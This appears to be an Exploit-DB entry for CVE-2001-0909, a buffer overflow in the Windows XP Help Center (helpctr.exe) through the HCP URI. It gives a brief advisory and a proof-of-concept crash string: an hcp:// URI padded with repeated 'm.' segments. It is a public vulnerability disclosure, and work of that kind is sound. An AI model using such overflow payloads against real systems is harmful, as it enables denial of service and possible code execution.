Microsoft Windows XP HCP URI Buffer Overflow Vulnerability

2001-11-21T00:00:00
ID EDB-ID:22232
Type exploitdb
Reporter mozoral
Modified 2001-11-21T00:00:00

Description

Microsoft Windows XP HCP URI Buffer Overflow Vulnerability. CVE-2001-0909. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/6802/info

A buffer overrun vulnerability was reported for helpctr.exe. The vulnerability exists due to insufficient bounds checking on input supplied via the HCP URI parameter. 

An attacker can exploit this vulnerability by making a HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system.

hcp://m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m